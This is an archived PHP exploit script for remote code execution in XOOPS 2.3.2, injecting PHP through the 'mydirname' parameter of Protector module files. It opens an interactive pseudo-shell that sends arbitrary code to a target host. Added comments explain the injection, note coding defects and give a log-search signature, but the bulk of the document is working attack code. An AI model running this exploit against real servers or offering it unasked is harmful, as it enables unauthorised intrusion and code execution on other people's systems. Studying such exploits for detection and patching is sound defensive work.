# Title : XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit
# Published : 2009-01-08
# Author : StAkeR
#!/usr/bin/php -q
<?php
/****************************************************************
* XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit *
* by athos - staker[at]hotmail[dot]it *
* http://xoops.org *
* *
* thanks to s3rg3770 and The:Paradox *
* *
* works with register globals on *
* note: this vuln is a remote php code execution *
* *
* Directory (xoops_lib/modules/protector/) *
* onupdate.php?mydirname=a(){} [PHP CODE] function v *
* oninstall.php?mydirname=a(){} [PHP CODE] function v *
* notification.php?mydirname=a(){} [PHP CODE] function v *
****************************************************************/
// Script entry. Notices are silenced first because the code below relies on
// undefined variables ($data, $html, $urlex) and on a list() that runs before
// the argument count is checked.
error_reporting(0);
// Four positional values are consumed: the script name, host, path and $num.
// The usage banner below documents only host and path; $num (1-3, see
// data_exec) is undocumented and must still be supplied.
list($cli,$host,$path,$num) = $argv;
// The bare "n" / "r" at the string edges are "\n" / "\r" whose backslashes
// were stripped when this listing was published.
if ($argc != 4) {
print "n+--------------------------------------------------------------+n";
print "r| XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit |n";
print "r+--------------------------------------------------------------+n";
print "rby athos - staker[at]hotmail[dot]it / http://xoops.orgn";
print "rUsage: php xpl.php [host] [path]nn";
print "rhost + localhostn";
print "rpath + /XOOPSn";
exit;
}
// Called before its definition; legal in PHP for unconditional function
// declarations, which are hoisted at compile time.
exploit();
// Validates the script selector ($num, fourth argv) and enters the loop.
// Only the upper bound is checked: 0, negative or non-numeric values pass
// through, and data_exec() then never assigns $urlex.
function exploit() {
global $num;
if ($num > 3) {
// "n" here is a "\n" with its backslash lost in publication.
die("n$num isn't a valid optionn");
}
else {
yeat_shell();
}
}
// Interactive read/send loop. Each line read from STDIN is passed verbatim
// (after trim and stripslashes) to data_exec(). "exit"/"quit" terminate;
// "help" and "about" print a hint but do NOT skip the send, so the literal
// word is still transmitted as the request payload.
function yeat_shell() {
while (1) {
echo "yeat[php-shell]~$: ";
$exec = stripslashes(trim(fgets(STDIN)));
if (preg_match('/^(exit|--exit|quit|--quit)$/i',$exec)) die("nExitedn");
if (preg_match('/^(help|--help)$/i',$exec)) echo("nExample: uname -an");
if (preg_match('/^(about|--about)$/i',$exec)) echo("nstaker[at]hotmail[dot]itn");
// Prints the raw HTTP response (headers included) returned by data_send().
print data_exec($exec);
}
}
// Builds the raw HTTP/1.1 GET for one payload and returns the response.
// The query value "a(){}" closes a function header that the Protector
// module's script assembles from mydirname; the urlencoded $exec follows as
// bare PHP and the trailing "function v" re-opens a definition so the file
// still parses. That is the injection this listing demonstrates: a request
// parameter reaching dynamically evaluated code without validation.
// Defender note: the literal substring "mydirname=a(){}" in a request line
// is a usable log-search / WAF signature for this pattern.
// Defects (hidden by error_reporting(0)): $urlex is unset when $num is not
// 1-3, $data is appended to before being initialised, and the "rn" tokens
// are "\r\n" with lost backslashes.
function data_exec($exec) {
global $host,$path,$num;
if ($num == 1) {
$urlex = "/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}";
}
if ($num == 2) {
$urlex = "/xoops_lib/modules/protector/notification.php?mydirname=a(){}";
}
if ($num == 3) {
$urlex = "/xoops_lib/modules/protector/oninstall.php?mydirname=a(){}";
}
// urlencode() only makes the payload transport-safe; no further encoding.
$exec = urlencode($exec);
$data .= "GET /{$path}/{$urlex}{$exec}function%20v HTTP/1.1rn";
$data .= "Host: {$host}rn";
$data .= "User-Agent: Lynx (textmode)rn";
$data .= "Connection: closernrn";
$html = data_send ($host,$data);
return $html;
}
// Writes $data to a plain TCP socket on port 80 (no TLS, no explicit timeout)
// and returns the entire response, status line and headers included.
// The "@" suppresses the fsockopen warning; failure is reported only via die().
// $html is never initialised before the .= loop (notice hidden by
// error_reporting(0)).
function data_send ($host,$data) {
if (!$sock = @fsockopen($host,80)) {
die("Connection refused,try again!n");
} fputs($sock,$data);
// Reads until the server closes the connection ("Connection: close" above).
while (!feof($sock)) { $html .= fgets($sock); }
fclose($sock);
return $html;
}